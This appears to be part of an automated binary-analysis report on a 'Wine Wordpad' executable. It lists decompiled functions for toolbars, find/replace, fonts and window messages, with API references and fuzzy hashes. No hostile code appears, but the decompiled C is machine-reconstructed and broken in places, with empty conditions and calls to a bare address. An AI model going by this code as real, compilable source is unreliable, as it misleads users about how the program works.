					if(_t43 == 0) {
						L4:
						SetWindowTextW(_a4,  &_v636);
						return E004018DD( *0x408028, 0x6a9, L"Wine Wordpad", 0x40);
					}
					asm("movss xmm0, [ebp-0x4]");
					asm("comiss xmm0, [0x4064e8]");
					if(_t43 <= 0) {
						goto L4;
					}
					_push(_t34);
					asm("movss [esp], xmm0");
					return E00405126();
				}
			}

0x00404612
0x0040461a
0x00404632
0x0040463d
0x0040463e
0x0040464e
0x00404661
0x00404669
0x004046cb
0x0040466b
0x0040466b
0x00404680
0x00404682
0x004046a0
0x004046aa
0x00000000
0x004046c7
0x00404684
0x00404689
0x00404690
0x00000000
0x00000000
0x00404692
0x00404693
0x0040469f
0x0040469f

APIs

memset.MSVCRT ref: 00404612
SendMessageW.USER32(0000043A,00000001,00000074), ref: 00404632
wsprintfW.USER32 ref: 0040464E
lstrcmpW.KERNEL32(?,?), ref: 00404661

Part of subcall function 004044E2: _errno.MSVCRT ref: 004044F0
Part of subcall function 004044E2: wcstod.MSVCRT ref: 00404501
Part of subcall function 004044E2: _errno.MSVCRT ref: 00404529

SetWindowTextW.USER32(?,?), ref: 004046AA

Part of subcall function 00405126: memset.MSVCRT ref: 00405134
Part of subcall function 00405126: SendMessageW.USER32(00000444,00000001,00000074), ref: 00405172

Strings

%2d, xrefs: 00404648
t, xrefs: 0040461A
Wine Wordpad, xrefs: 004046B2

Memory Dump Source

Source File: 00000000.00000002.222588618.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.222577382.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222607698.0000000000406000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222613532.000000000040A000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend_errnomemset$TextWindowlstrcmpwcstodwsprintf
String ID: %2d$Wine Wordpad$t
API String ID: 820840223-3703690560
Opcode ID: 98bb543654577e4223c2e19d3dc969945e70e7cb4b7b583bf4879e7c1ca500e9
Instruction ID: 8ed8f86714212377ee5611f57ca3c849f17844c4c14bb4a117c16f19121d4bad
Opcode Fuzzy Hash: 98bb543654577e4223c2e19d3dc969945e70e7cb4b7b583bf4879e7c1ca500e9
Instruction Fuzzy Hash: 01119A71D40208BBEF10AF61ED0AF9D77BC9B04300F104175B605B60E1EBB996688F58

Uniqueness

Uniqueness Score: -1.00%

Function 00403BBF, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 77
windowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00403BBF(intOrPtr* _a4, intOrPtr _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				signed int* _v20;
				signed int* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v36;
				struct HWND__* _t28;
				struct HWND__* _t34;
				long _t44;
				intOrPtr* _t47;

				_t28 =  *0x408030;
				_t47 = _a4;
				if(_t28 == 0) {
					 *((intOrPtr*)(_t47 + 8)) = 0;
					 *(_t47 + 0x10) = 0;
					 *((intOrPtr*)(_t47 + 0x14)) = 0;
					 *((intOrPtr*)(_t47 + 0x18)) = 0;
					 *(_t47 + 0x1c) = 0;
					 *((intOrPtr*)(_t47 + 0x20)) = 0;
					 *((intOrPtr*)(_t47 + 0x24)) = 0;
					 *((intOrPtr*)(_t47 + 4)) =  *0x408028;
					 *_t47 = 0x28;
					 *((intOrPtr*)(_t47 + 0xc)) = 0x4000;
					SendMessageW( *0x40802c, 0xb0,  &_v16,  &_v12);
					_v8 = 0x40633c;
					if(_v16 == _v12 || SendMessageW( *0x40802c, 0x47b, 1,  &_v16) != 0xffffffff) {
						_t44 = 0x409888;
					} else {
						_v24 = 0;
						_v20 = 0;
						_t44 = 0x409680;
						_v36 = 0x100;
						_v32 = 2;
						_v28 = 0x4b0;
						SendMessageW( *0x40802c, 0x45e,  &_v36, 0x409680);
					}
					 *(_t47 + 0x10) = _t44;
					 *((intOrPtr*)(_t47 + 0x14)) = 0x409780;
					 *0x409880 =  *0x409880 | 0xffffffff;
					 *0x409884 =  *0x409884 & 0x00000000;
					 *(_t47 + 0x1c) = 0x409880;
					 *((intOrPtr*)(_t47 + 0x18)) = 0x1000100;
					_push(_t47);
					if(_a8 == 0) {
						_t34 = FindTextW(??);
					} else {
						_t34 = ReplaceTextW();
					}
					 *0x408030 = _t34;
				} else {
					_t34 = SetActiveWindow(_t28);
				}
				return _t34;
			}

0x00403bc2
0x00403bcb
0x00403bd0
0x00403be2
0x00403be5
0x00403be8
0x00403beb
0x00403bee
0x00403bf1
0x00403bf4
0x00403c02
0x00403c0c
0x00403c1e
0x00403c25
0x00403c2a
0x00403c34
0x00403c82
0x00403c4e
0x00403c4e
0x00403c54
0x00403c57
0x00403c69
0x00403c70
0x00403c77
0x00403c7e
0x00403c7e
0x00403c87
0x00403c8b
0x00403c92
0x00403c99
0x00403ca5
0x00403cac
0x00403cb3
0x00403cb4
0x00403cbe
0x00403cb6
0x00403cb6
0x00403cb6
0x00403cc4
0x00403bd2
0x00403bd3
0x00403bd3
0x00403ccb

APIs

SetActiveWindow.USER32(?), ref: 00403BD3
SendMessageW.USER32(000000B0,?,?), ref: 00403C25
SendMessageW.USER32(0000047B,00000001,00004000), ref: 00403C47
SendMessageW.USER32(0000045E,?,00409680), ref: 00403C7E
ReplaceTextW.COMDLG32(?), ref: 00403CB6

Strings

<c@, xrefs: 00403C2A

Memory Dump Source

Source File: 00000000.00000002.222588618.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.222577382.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222607698.0000000000406000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222613532.000000000040A000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$ActiveReplaceTextWindow
String ID: <c@
API String ID: 2485441528-3929848850
Opcode ID: bfd987386c15611c1611c150d861bebaa169916ed30452ef2ce7832ff7b93360
Instruction ID: 9a98af06ab3a99d8d16e6883742cca5bebea58c7c37f118ac31051f8c950bc7d
Opcode Fuzzy Hash: bfd987386c15611c1611c150d861bebaa169916ed30452ef2ce7832ff7b93360
Instruction Fuzzy Hash: A43120B1800704DFD7209F65D944A9AFBF8FB44715F10862FD956B72A0C7B4A648CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00402355, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 80
windowCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00402355(signed int __eax, void* __ebx, void* __ecx, void* _a4) {
				void* _v4;
				struct HWND__* _v8;
				void* _v12;
				struct HDC__* _v16;
				struct HWND__* _v20;
				struct HWND__* _v24;
				signed int _v28;
				void* _v32;
				int _v44;
				int _v48;
				void* _v52;
				intOrPtr _v88;
				signed int _v92;
				int _v100;
				intOrPtr _v104;
				int _v108;
				struct HWND__* _v112;
				intOrPtr _v117;
				signed int _v136;
				intOrPtr _v140;
				void* _v144;
				int _v152;
				int _v160;
				struct tagRECT _v176;
				void* _t96;
				signed int _t109;
				struct HWND__* _t110;
				unsigned int _t138;
				struct HWND__* _t140;
				struct HWND__* _t144;
				void* _t147;
				struct HDC__* _t148;
				void* _t149;
				int* _t150;
				int* _t153;
				int _t158;
				struct HWND__* _t163;
				int _t164;
				int _t168;
				struct HWND__* _t185;
				struct HWND__* _t189;
				int _t197;
				signed int _t198;
				void* _t203;
				struct HWND__* _t207;
				void* _t220;
				void* _t227;
				struct HWND__* _t228;
				struct HWND__* _t229;
				struct HWND__* _t231;
				struct HWND__* _t232;
				void* _t236;
				long _t237;
				struct HDC__* _t245;
				struct HWND__* _t247;
				void* _t254;
				void* _t255;
				intOrPtr* _t256;
				intOrPtr* _t260;

				asm("sbb al, [eax]");
				_t96 = (__eax &  *__eax) + 1 + __ebx + 1;
				_t203 = __ebx + _t96;
				asm("sbb al, [eax]");
				asm("sbb al, [eax]");
				asm("cmpsb");
				asm("sbb al, [eax]");
				 *((intOrPtr*)(_t203 + 0x1e)) =  *((intOrPtr*)(_t203 + 0x1e)) + _t203;
				 *((intOrPtr*)(__ecx - 0x2fffbfe2)) =  *((intOrPtr*)(__ecx - 0x2fffbfe2)) + __ecx;
				asm("sbb eax, 0x1daf0040");
				 *((intOrPtr*)(_t96 + 3 - 0x45ffbfe3)) =  *((intOrPtr*)(_t96 + 3 - 0x45ffbfe3)) + _t96 + 3;
				asm("sbb eax, 0x1dc50040");
				_push(ds);
				_push(ds);
				_v117 = _v117 + 0x1a;
				_t255 = _t254 - 0xac;
				_push(_t203);
				_t227 = GetModuleHandleW(0);
				_v20 = _t227;
				CreateStatusWindowW(0x50000040, L"RichEdit text", _v4, 0x7d0);
				_t236 = CreateWindowExW(0x80, L"ReBarWindow32", 0, 0x56000241, 0x80000000, 0x80000000, 0, 0, _v4, 0x7d4, _t227, 0);
				_v48 = 0;
				_v44 = 0;
				_v16 = _t236;
				_v52 = 0xc;
				_t109 = SendMessageW(_t236, 0x404, 0,  &_v52);
				if(_t109 != 0) {
					_t110 = CreateToolbarEx(_t236, 0x5000010a, 0x7d2, 1, _t227, 0x64, 0, 0, 0x18, 0x18, 0x10, 0x10, 0x14);
					_v32 = _v32 | 0xffffffff;
					_t228 = _t110;
					_v28 = _v28 & 0x00000000;
					_t237 = SendMessageW(_t228, 0x413, 0,  &_v32);
					_t22 = _t237 + 6; // 0x6
					E004011B2(_t228, _t22, 0x3eb);
					_t23 = _t237 + 7; // 0x7
					E004011B2(_t228, _t23, 0x3e9);
					_t24 = _t237 + 8; // 0x8
					E004011B2(_t228, _t24, 0x3ea);
					E0040120A(_t228);
					_t25 = _t237 + 0xe; // 0xe
					E004011B2(_t228, _t25, 0x3f5);
					_t26 = _t237 + 9; // 0x9
					E004011B2(_t228, _t26, 0x3f3);
					_t256 = _t255 + 0x40;
					E0040120A(_t228);
					_t27 = _t237 + 0xc; // 0xc
					 *_t256 = 0x3f6;
					E004011B2();
					E0040120A(_t228);
					E004011B2(_t228, _t237, 0x51f);
					_t28 = _t237 + 1; // 0x1
					E004011B2(_t228, _t28, 0x51e);
					_t29 = _t237 + 2; // 0x2
					E004011B2(_t228, _t29, 0x520);
					_t30 = _t237 + 3; // 0x3
					E004011B2(_t228, _t30, 0x51b);
					_t31 = _t237 + 4; // 0x4
					E004011B2(_t228, _t31, 0x51c);
					E0040120A(_t228);
					E004011CA(_t228, 0, 0x640, 0);
					SendMessageW(_t228, 0x421, 0, 0);
					_t138 = SendMessageW(_t228, 0x43a, 0, 0);
					_t140 = CreateWindowExW(0, L"ComboBoxEx32", 0, 0x50800102, 0, 0, 0xc8, 0x96, _v8, 0x7dd, _v12, 0);
					_v20 = _t140;
					GetWindowRect(_t140,  &_v176);
					_v144 = 0x50;
					_v140 = 0x171;
					_t144 =  >  ? _t138 >> 0x10 : _v176.bottom - _v176.top;
					_v136 = 0x105;
					_v24 = _t144;
					_v104 = _t144;
					_v88 = _t144;
					_v100 = 0;
					_v112 = _t228;
					_v108 = 0;
					_v92 = 2;
					SendMessageW(_v8, 0x40a, 0xffffffff,  &_v144);
					_t229 = _v20;
					_t147 = SendMessageW(_t229, 0x31, 0, 0);
					_t148 = GetDC(_t229);
					_v16 = _t148;
					_t149 = SelectObject(_t148, _t147);
					_t150 =  &_v152;
					0x400000(_t150, _t228, _t27);
					GetTextExtentPointW(_v16, L"Times New Roman", _t150 - 1, L"Times New Roman");
					_t153 =  &_v160;
					0x400000(_t153);
					GetTextExtentPointW(_v16, L" 00", _t153 - 1, L" 00");
					_t245 = _v16;
					SelectObject(_t245, _t149);
					_t207 = _v20;
					ReleaseDC(_t207, _t245);
					_v112 = _t207;
					_t158 = MulDiv(_v152, 3, 2);
					_t231 = _v24;
					_v100 = _t158 + _t231;
					_v92 = 4;
					SendMessageW(_v8, 0x40a, 0xffffffff,  &_v144);
					_t163 = CreateWindowExW(0, L"ComboBoxEx32", 0, 0x50800002, 0, 0, 0x32, 0x96, _v8, 0x7de, _v12, 0);
					_v24 = _t163;
					_v112 = _t163;
					_t164 = MulDiv(_v160, 3, 2);
					_v136 = _v136 ^ 0x00000001;
					_t232 = _v8;
					_v100 = _t164 + _t231;
					_v92 = 5;
					SendMessageW(_t232, 0x40a, 0xffffffff,  &_v144);
					_push(0x14);
					_t168 = 0x10;
					_t247 = CreateToolbarEx(_t232, 0x1000010a, 0x7d3, 8, _v12, 0x65, 0, 0, _t168, _t168, _t168, _t168, ??);
					SendMessageW(_t247, 0x454, 0, 1);
					E004011CA(_t247, 0, 0x578, 0);
					E004011CA(_t247, 1, 0x579, 0);
					E004011CA(_t247, 2, 0x57a, 0);
					E004011CA(_t247, 3, 0x57b, 0);
					E0040120A(_t247);
					E004011CA(_t247, 4, 0x44c, 0);
					E004011CA(_t247, 5, 0x44d, 0);
					E004011CA(_t247, 6, 0x44e, 0);
					E0040120A(_t247);
					E004011CA(_t247, 7, 0x522, 8);
					_t260 = _t256 + 0xe8;
					SendMessageW(_t247, 0x421, 0, 0);
					_v112 = _t247;
					_v92 = 3;
					SendMessageW(_t232, 0x40a, 0xffffffff,  &_v144);
					_t185 = CreateWindowExW(0, L"Static", 0, 0x50000000, 0, 0, 0xc8, 0xa, _t232, 0x7df, _v12, 0);
					_v92 = _v92 & 0x00000000;
					_v136 = _v136 | 0x00000001;
					_v112 = _t185;
					SendMessageW(_t232, 0x40a, 0xffffffff,  &_v144);
					if(LoadLibraryW(L"RICHED20.DLL") == 0) {
						E004018DD(_a4, 0x6a7, L"Wine Wordpad", 0x30);
						_t260 = _t260 + 0x10;
						PostQuitMessage(1);
					}
					_t189 =  *0x40802c;
					if(_t189 != 0) {
						0x400000();
						SetFocus( *0x40802c);
						SendMessageW( *0x40802c, 0x445, 0, 0x80000);
						E0040502E();
						E00404AD7(_v20);
						E00404C59(_v24);
						_t220 = _t189;
						E004013B5(_t220);
						SendMessageW( *0x40802c, 0xb9, 0, 0);
						_t197 = RegisterWindowMessageW(L"commdlg_FindReplace");
						 *0x408038 = _t197;
						0x400000(_a4);
						 *_t260 = 0x40803c;
						0x400000(0x408044);
						0x400000();
						DragAcceptFiles(_a4, 1);
						_t198 = 0;
					} else {
						_t109 = E004040F0( *0x400000(GetLastError()), 2, "Error code %u\n");
						goto L2;
					}
				} else {
					L2:
					_t198 = _t109 | 0xffffffff;
				}
				return _t198;
			}

0x0040235d
0x00402362
0x00402363
0x00402365
0x00402369
0x0040236c
0x0040236d
0x00402373
0x00402377
0x0040237d
0x00402383
0x00402389
0x00402391
0x00402395
0x00402397
0x0040239b
0x004023a1
0x004023b5
0x004023c1
0x004023c4
0x004023f3
0x004023f5
0x004023fb
0x0040240c
0x0040240f
0x00402416
0x0040241a
0x00402442
0x00402448
0x0040244c
0x0040244e
0x00402460
0x00402467
0x0040246c
0x00402476
0x0040247b
0x00402485
0x0040248a
0x00402490
0x0040249a
0x0040249f
0x004024a9
0x004024ae
0x004024b3
0x004024b7
0x004024bc
0x004024bf
0x004024c8
0x004024ce
0x004024da
0x004024e4
0x004024e9
0x004024f3
0x004024f8
0x00402502
0x00402507
0x00402514
0x00402519
0x0040251f
0x0040252e
0x0040253e
0x00402548
0x00402575
0x00402581
0x00402586
0x0040259a
0x004025a4
0x004025ae
0x004025b1
0x004025bb
0x004025c0
0x004025c3
0x004025d7
0x004025da
0x004025dd
0x004025e0
0x004025e7
0x004025e9
0x004025f1
0x004025f6
0x00402604
0x00402607
0x0040260b
0x00402618
0x0040262a
0x0040262c
0x00402638
0x00402648
0x0040264a
0x0040264f
0x00402651
0x00402656
0x0040266c
0x0040266f
0x00402671
0x0040267c
0x00402690
0x00402697
0x004026bc
0x004026cc
0x004026cf
0x004026d2
0x004026d4
0x004026dd
0x004026e0
0x004026f2
0x004026f9
0x004026fb
0x004026ff
0x00402724
0x0040272c
0x00402738
0x00402747
0x00402756
0x00402765
0x0040276e
0x0040277d
0x0040278c
0x0040279b
0x004027a1
0x004027b0
0x004027b5
0x004027c2
0x004027ca
0x004027d5
0x004027de
0x00402801
0x00402807
0x0040280b
0x00402812
0x00402820
0x0040282f
0x00402840
0x00402845
0x0040284a
0x0040284a
0x00402850
0x00402857
0x0040287d
0x00402889
0x004028a2
0x004028a4
0x004028ad
0x004028b5
0x004028bb
0x004028bc
0x004028ce
0x004028d5
0x004028de
0x004028e3
0x004028e8
0x004028f4
0x004028fb
0x00402905
0x0040290b
0x00402859
0x0040286f
0x00000000
0x00402874
0x0040241c
0x0040241c
0x0040241c
0x0040241c
0x00402911

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 004023A7
CreateStatusWindowW.COMCTL32(50000040,RichEdit text,?,000007D0), ref: 004023C4
CreateWindowExW.USER32 ref: 004023ED
SendMessageW.USER32(00000000,00000404,00000000,?), ref: 00402416
CreateToolbarEx.COMCTL32(00000000,5000010A,000007D2,00000001,00000000,00000064,00000000,00000000,00000018,00000018,00000010,00000010,00000014), ref: 00402442
SendMessageW.USER32(00000000,00000413,00000000,000000FF), ref: 0040245E
SendMessageW.USER32(00000000,00000421,00000000,00000000), ref: 0040253E

Strings

ReBarWindow32, xrefs: 004023E3
RichEdit text, xrefs: 004023B7

Memory Dump Source

Source File: 00000000.00000002.222588618.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.222577382.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222607698.0000000000406000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222613532.000000000040A000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateMessageSend$Window$HandleModuleStatusToolbar
String ID: ReBarWindow32$RichEdit text
API String ID: 903917145-810735603
Opcode ID: cfe665a737eb6befbf7bab7b813fdabefadd0b7c2e27d5eb6d1ee5ec7df4bb9f
Instruction ID: c714ad5423c55c916eef4b05d73938e199e946f83d0b5ab1fea8e800b83b6fe5
Opcode Fuzzy Hash: cfe665a737eb6befbf7bab7b813fdabefadd0b7c2e27d5eb6d1ee5ec7df4bb9f
Instruction Fuzzy Hash: 5221F6705842446FE7014BE48C89FFA7FB8EF05664F2401DAF98AF7192C2BC48468B65

Uniqueness

Uniqueness Score: -1.00%

Function 0040595A, Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E0040595A(WCHAR* _a4, short _a8) {
				signed int _t9;
				short _t10;
				short _t11;
				short _t12;
				short _t13;
				signed int _t14;
				short _t23;
				void* _t26;
				short _t27;
				WCHAR* _t28;

				_t27 = _a8;
				if(_t27 != 0) {
					 *_t27 = 0;
				}
				_t28 = _a4;
				if(_t28 != 0) {
					_t9 =  *_t28 & 0x0000ffff;
					__eflags = _t9;
					if(_t9 != 0) {
						_t26 = 0x20;
						__eflags = _t9 - _t26;
						if(_t9 != _t26) {
							L8:
							__eflags = _t27;
							if(_t27 != 0) {
								_t10 = lstrcmpW(_t28, 0x408e80);
								__eflags = _t10;
								if(_t10 != 0) {
									_t11 = lstrcmpW(_t28, 0x409080);
									__eflags = _t11;
									if(_t11 != 0) {
										_t12 = lstrcmpW(_t28, 0x409280);
										__eflags = _t12;
										if(_t12 != 0) {
											_t13 = lstrcmpW(_t28, 0x409480);
											__eflags = _t13;
											if(_t13 != 0) {
												L19:
												_t23 = 0;
												__eflags = 0;
												L20:
												_t14 = 0;
												__eflags =  *_t28 - _t23;
												L21:
												_t8 = __eflags == 0;
												__eflags = _t8;
												return _t14 & 0xffffff00 | _t8;
											}
											 *_t27 = 2;
											_push(0x409480);
											L18:
											_t28 =  &(_t28[lstrlenW()]);
											goto L19;
										}
										 *_t27 = 1;
										_push(0x409280);
										goto L18;
									}
									 *_t27 = 1;
									_push(0x409080);
									goto L18;
								}
								_t23 = 0;
								 *_t27 = 0;
								_t28 =  &(_t28[lstrlenW(0x408e80)]);
								goto L20;
							}
							_t14 = 0;
							__eflags =  *_t28;
							goto L21;
						} else {
							goto L7;
						}
						do {
							L7:
							_t28 =  &(_t28[1]);
							__eflags =  *_t28 - _t26;
						} while ( *_t28 == _t26);
						goto L8;
					}
					return 1;
				} else {
					return 0;
				}
			}

0x0040595f
0x00405966
0x00405968
0x00405968
0x0040596a
0x0040596f
0x00405978
0x0040597b
0x0040597e
0x0040598a
0x0040598b
0x0040598e
0x00405998
0x00405998
0x0040599a
0x004059b3
0x004059b5
0x004059b7
0x004059d3
0x004059d5
0x004059d7
0x004059ec
0x004059ee
0x004059f0
0x00405a05
0x00405a07
0x00405a09
0x00405a1f
0x00405a1f
0x00405a1f
0x00405a21
0x00405a21
0x00405a23
0x00405a27
0x00405a27
0x00405a27
0x00000000
0x00405a27
0x00405a0b
0x00405a11
0x00405a16
0x00405a1c
0x00000000
0x00405a1c
0x004059f2
0x004059f8
0x00000000
0x004059f8
0x004059d9
0x004059df
0x00000000
0x004059df
0x004059b9
0x004059c0
0x004059c8
0x00000000
0x004059c8
0x0040599c
0x0040599e
0x00000000
0x00000000
0x00000000
0x00000000
0x00405990
0x00405990
0x00405990
0x00405993
0x00405993
0x00000000
0x00405990
0x00000000
0x00405971
0x00000000
0x00405971

Strings

}F@, xrefs: 0040595D

Memory Dump Source

Source File: 00000000.00000002.222588618.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.222577382.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222607698.0000000000406000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222613532.000000000040A000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: }F@
API String ID: 0-1939311362
Opcode ID: 527b3ebd0f5bcfd0f8a718649dd102caaa76a8b4095c2281ce5ffc4ab79e1213
Instruction ID: 8f0ef37fcf64f6f65f02c5494a6479e411b9e58bae7b81f643941314baec2bdd
Opcode Fuzzy Hash: 527b3ebd0f5bcfd0f8a718649dd102caaa76a8b4095c2281ce5ffc4ab79e1213
Instruction Fuzzy Hash: 1321C371750B13DACB206F649C81BA773A4DF90760B20443BE886B32C0E3BC9D468E9D

Uniqueness

Uniqueness Score: -1.00%

Function 0040502E, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 28
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040502E() {
				short _v94;
				void _v108;
				signed int _v112;
				intOrPtr _v116;
				void* _v120;

				memset( &_v108, 0, 0x68);
				_v112 = _v112 & 0x00000000;
				_v120 = 0x74;
				_t13 =  !=  ? L"Times New Roman" : L"Courier New";
				_v116 = 0x20000007;
				lstrcpyW( &_v94,  !=  ? L"Times New Roman" : L"Courier New");
				return SendMessageW( *0x40802c, 0x444, 0,  &_v120);
			}

0x0040503c
0x00405041
0x00405059
0x00405060
0x00405063
0x0040506f
0x0040508d

APIs

memset.MSVCRT ref: 0040503C
lstrcpyW.KERNEL32 ref: 0040506F
SendMessageW.USER32(00000444,00000000,00000074), ref: 00405086

Strings

Times New Roman, xrefs: 0040504F
Courier New, xrefs: 00405054, 0040506A
t, xrefs: 00405059

Memory Dump Source

Source File: 00000000.00000002.222588618.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.222577382.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222607698.0000000000406000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222613532.000000000040A000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSendlstrcpymemset
String ID: Courier New$Times New Roman$t
API String ID: 1422005481-1175908851
Opcode ID: 4eafa6b0424339d97c858d3a125c9795b5708a931056c8c213e443df7eca123d
Instruction ID: 8ceab6e82f6e06611966759afe875246a75faf0b8c643eb55e9120e1083bcff2
Opcode Fuzzy Hash: 4eafa6b0424339d97c858d3a125c9795b5708a931056c8c213e443df7eca123d
Instruction Fuzzy Hash: 6AF0F4B19443089BEB109BA0DE09B4D7ABCAB40709F114139B545B71D1D7B99518CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040348B, Relevance: 9.1, APIs: 6, Instructions: 134
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E0040348B(void* __edx, void* __edi, void* __fp0, struct HWND__* _a4, intOrPtr _a8, void* _a12, int _a16) {
				short _v524;
				void* __esi;
				void* _t32;
				void* _t34;
				void* _t35;
				void* _t36;
				void* _t37;
				void* _t40;
				void* _t46;
				void* _t47;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;
				void* _t54;
				void* _t56;
				intOrPtr _t64;
				intOrPtr* _t65;

				_t64 = _a8;
				if(_t64 !=  *0x408038) {
					__eflags = _t64 - 0x4e;
					if(__eflags > 0) {
						_t32 = _t64 - 0x7b;
						__eflags = _t32;
						if(_t32 == 0) {
							_push(_a16);
							_push(_a12);
							_push(0x7b);
							L41:
							return DefWindowProcW(_a4, ??, ??, ??);
						}
						_t34 = _t32 - 0x96;
						__eflags = _t34;
						if(_t34 == 0) {
							0x400000();
							__eflags = _t34;
							if(_t34 == 0) {
								_t35 = E00401928(__fp0, _a4, _a12, _a16);
								L39:
								return _t35;
							}
							0x400000(_a4, _a12);
							L24:
							L2:
							return _t34;
						}
						_t36 = _t34 - 6;
						__eflags = _t36;
						if(_t36 == 0) {
							_t34 = E00402912(_a4, _a12);
							goto L24;
						}
						_t37 = _t36 - 0x11c;
						__eflags = _t37;
						if(_t37 == 0) {
							DragQueryFileW(_a12, 0,  &_v524, 0x104);
							DragFinish(_a12);
							_t40 = E00404E0F();
							__eflags = _t40;
							if(_t40 == 0) {
								L20:
								return 0;
							}
							E004014EA(_t56,  &_v524);
							L34:
							goto L20;
						}
						__eflags = _t37 == 0x1cd;
						if(_t37 == 0x1cd) {
							_t34 = E00402EEC(_a4);
							goto L2;
						}
						L30:
						_push(_a16);
						_push(_a12);
						_push(_t64);
						goto L41;
					}
					if(__eflags == 0) {
						_t34 = E00402C46(__fp0, _a4, _a16);
						goto L24;
					}
					_t46 = _t64 - 1;
					__eflags = _t46;
					if(_t46 == 0) {
						_t34 = E00402398(__edx, _a4);
						goto L2;
					}
					_t47 = _t46 - 1;
					__eflags = _t47;
					if(_t47 == 0) {
						L15:
						PostQuitMessage(0);
						goto L20;
					}
					_t48 = _t47 - 3;
					__eflags = _t48;
					if(_t48 == 0) {
						_t35 = E00402DED(_t48, _a4, _a12, _a16);
						goto L39;
					}
					_t49 = _t48 - 1;
					__eflags = _t49;
					if(_t49 == 0) {
						__eflags = _a12;
						if(_a12 != 0) {
							SetFocus(GetDlgItem(_a4, 0x7d1));
						}
						goto L20;
					}
					_t52 = _t49 - 9;
					__eflags = _t52;
					if(_t52 == 0) {
						0x400000();
						__eflags = _t52;
						if(_t52 != 0) {
							goto L30;
						}
						_push(_a16);
						_push(_a12);
						_push(0xf);
						goto L41;
					}
					_t53 = _t52 - 1;
					__eflags = _t53;
					if(_t53 != 0) {
						goto L30;
					}
					0x400000();
					__eflags = _t53;
					if(__eflags == 0) {
						_t54 = E00404E0F();
						__eflags = _t54;
						if(_t54 == 0) {
							goto L20;
						}
						0x400000( *0x408028);
						 *_t65 = 0x40803c;
						0x400000(0x408044);
						goto L15;
					}
					_push(_a4);
					E00404DB2(__edi, _t64, __eflags);
					goto L34;
				}
				_t34 = E00404195(_a16);
				goto L2;
			}

0x00403495
0x0040349e
0x004034ae
0x004034b1
0x004035a0
0x004035a0
0x004035a3
0x00403657
0x0040365a
0x0040365d
0x0040365f
0x00000000
0x00403662
0x004035a9
0x004035a9
0x004035ae
0x0040362b
0x00403630
0x00403632
0x0040364d
0x00403652
0x00000000
0x00403652
0x0040363a
0x00403598
0x004034a8
0x00000000
0x004034a8
0x004035b0
0x004035b0
0x004035b3
0x00403621
0x00000000
0x00403621
0x004035b5
0x004035b5
0x004035ba
0x004035ed
0x004035f6
0x004035fc
0x00403601
0x00403603
0x00403566
0x00000000
0x00403566
0x00403610
0x00403615
0x00000000
0x00403615
0x004035bc
0x004035c1
0x004035d2
0x00000000
0x004035d2
0x004035c3
0x004035c3
0x004035c6
0x004035c9
0x00000000
0x004035c9
0x004034b7
0x00403593
0x00000000
0x00403593
0x004034bf
0x004034bf
0x004034c2
0x00403583
0x00000000
0x00403583
0x004034c8
0x004034c8
0x004034cb
0x00403526
0x00403528
0x00000000
0x00403528
0x004034cd
0x004034cd
0x004034d0
0x00403576
0x00000000
0x00403576
0x004034d6
0x004034d6
0x004034d9
0x0040354a
0x0040354f
0x00403560
0x00403560
0x00000000
0x0040354f
0x004034db
0x004034db
0x004034de
0x00403530
0x00403535
0x00403537
0x00000000
0x00000000
0x0040353d
0x00403540
0x00403543
0x00000000
0x00403543
0x004034e0
0x004034e0
0x004034e3
0x00000000
0x00000000
0x004034e9
0x004034ee
0x004034f0
0x004034ff
0x00403504
0x00403506
0x00000000
0x00000000
0x0040350e
0x00403513
0x0040351f
0x00000000
0x00403525
0x004034f2
0x004034f5
0x00000000
0x004034f5
0x004034a3
0x00000000

Memory Dump Source

Source File: 00000000.00000002.222588618.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.222577382.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222607698.0000000000406000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222613532.000000000040A000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c1fcfe601503d35317d4a590c14c76fe325503e8d778a8a8e23e224dfc18abc
Instruction ID: 214e01b8f4381773209f09fa58b9f5e5bea1c95292c58536dc7a56fdafecd5cf
Opcode Fuzzy Hash: 0c1fcfe601503d35317d4a590c14c76fe325503e8d778a8a8e23e224dfc18abc
Instruction Fuzzy Hash: 77417F31004106BBDF226F75DE09AAA3E29AF04346F14443BF911791F1DB7ECB61AA5D

Uniqueness

